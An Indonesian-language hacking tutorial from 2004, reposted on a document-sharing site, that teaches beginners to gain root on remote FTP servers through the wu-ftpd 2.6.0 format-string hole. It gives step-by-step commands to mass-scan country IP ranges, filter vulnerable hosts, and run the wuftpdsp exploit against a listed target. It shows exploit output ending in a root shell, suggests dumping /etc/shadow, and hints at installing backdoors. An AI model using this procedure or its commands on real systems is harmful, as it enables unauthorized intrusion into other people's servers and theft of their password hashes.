Bagaimana Menggunakan _wu-ftpd_ Remote Eksploit

  • June 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Bagaimana Menggunakan _wu-ftpd_ Remote Eksploit as PDF for free.

More details

  • Words: 697
  • Pages: 4
Koleksi Artikel dari Biasawae Community Copyleft  2004 biasawae.com

Bagaimana Menggunakan (wu-ftpd) Remote Eksploit Sumber : cbug aka CyberBug - Kecoak Elektronik



!

"

Koleksi Artikel dari Biasawae Community Copyleft  2004 biasawae.com Nah ... mulai darimana kita? ... mmm ... singkat saja remote exploit adalah program/eksploit yang jika dijalankan dari mesin kamu dengan sasaran server tertentu, akan mengakibatkan anda mendapatkan root shell di mesin/server sasaran yang berarti kamu mempunyai akses root dimesin tsb (asik ya?) ini yang disebut cracking (beberapa kiddie menyebutnya hacking ... tapi bukan itu namanya yg benar cracking ... hehehe) dan yang make eksploit itu disebut script kiddie :P~ BTW ... semua instruksi ini harus dijalankan di mesin linux/*nix. A. Mass Target Scanning Untuk bisa mendapatkan sasaran tentu saja kita harus punya daftar IP yang akan di crack ... ya kan? ... nah daftar IP itu bisa saja berupa kumpulan IP yang kamu sudah tahu atau punya teman2 kamu dan kamu simpan di satu file. Tapi untuk mudahnya kita bisa menggunakan program ADMz0ne dari ADM Crew untuk mendapatkan daftar IP yang kita inginkan. 1. Download precompiled binary program z0ne dari site Kecoak 2. Kalau anda download precompiled jangan lupa : ~$ chmod +x z0ne 3. Misalnya kamu ingin dapat list IP dari a. Phillipines (.ph) : nohup ./z0ne -o ph > ph.log & b. Site Commercial di Afrika Selatan nohup ./z0ne -o co.za > co.za.log & c. Dan lain-lain ... coba bereksperimen dengan domain Note : nohup dan & di awal dan akhir perintah adalah untuk membackground proses scanning, ketik : man nohup kalo ingin tahu lebih banyak. 4. Untuk contoh ini misalnya anda berhasil mendapatkan list IP dari Phillipines (.ph) dan disimpan di file ph.log Isinya kira2 seperti berikut ini : ~$ cat ph.log 210.23.230.195 210.23.234.33 210.23.234.65 210.23.230.193 203.167.64.2 203.167.64.3 ---dst---

Koleksi Artikel dari Biasawae Community Copyleft  2004 biasawae.com B. Scanning server yang mempunyai wufptd hole 1. Download precompiled binary program wu-scan dari site Kecoak 2. Atau anda bisa download source nya wu-scan.c kemudian compile: gcc -o wu-scan wu-scan.c 3. Kalau anda download precompiled jangan lupa : ~$ chmod +x wu-scan 4. Scan IP list yang sudah didapat sebelumnya (ph.log) nohup ./wu-scan ph.log & 5. Hasil akhirnya akan dituliskan di file wu-scan.log Hasilnya kira2 seperti ini : 210.23.234.42: wu-2.6.0(1) 203.176.29.195: wu-2.6.0(1) 208.160.224.133: Vulnerable wu-2.6.0(1) running on RH 6.2 IP yang bisa di crack adalah yang ada tulisan Vulnerable blah ;) Untuk mudahnya kamu bisa menaruh IP yg vulnerable di satu file lain misalnya ph.vul ~$ cat wu-scan.log | grep Vulnerable > ph.vul C. Cracking ... let's party! 1. Download precompiled binary program wuftpdsp dari site Kecoak 2. Atau anda bisa download source nya wuftpdsp.c kemudian compile: gcc -o wuftpdsp wuftpdsp.c 3. Kalau anda download precompiled jangan lupa : chmod +x wuftpdsp 4. Untuk me-remote exploit 208.160.224.133 ketik : ./wuftpdsp -s0 -t 208.160.224.133 --- ini yg akan keliatan di layar --Target: 208.160.224.133 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152 loggin into system.. USER ftp 331 Guest login ok, send your complete e-mail address as password.

Koleksi Artikel dari Biasawae Community Copyleft  2004 biasawae.com PASS <shellcode> 230 Guest login ok, access restrictions apply. STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04] STEP 3 : Checking if we can reach our return address by format string STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now) STEP 5 : Sending code.. this will take about 10 seconds. Press ^\ to leave shell blah ... uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) --- habis --6. Kamu bisa coba beberapa perintah standar seperti ls :P~ di root shell kamu yang baru, atau perintah lain yang agak bermanfaat ;) seperti cat /etc/passwd dan cat /etc/shadow 7. Dan seperti pesan nya tekan CTRL dan \ kalau ingin keluar dari root shell (dan kembali ke shell di mesin kamu sendiri. 8. Selain itu? kan ada trojan/backdoor dll, begitu mungkin kamu bertanya ehm ... ikuti saja Script Kiddies Tutorial berikutnya dan menjauhlah dari masalah ... OK? D. wu-ftpd eksploit lain. Buat yang masih penasaran dengan hasil wuftpdsp, coba gunakan wu-ftpd eksploitnya TESO Team - 7350wu Cara pakainya kamu cari sendiri ... anggap saja PR. Salam, cbug

Related Documents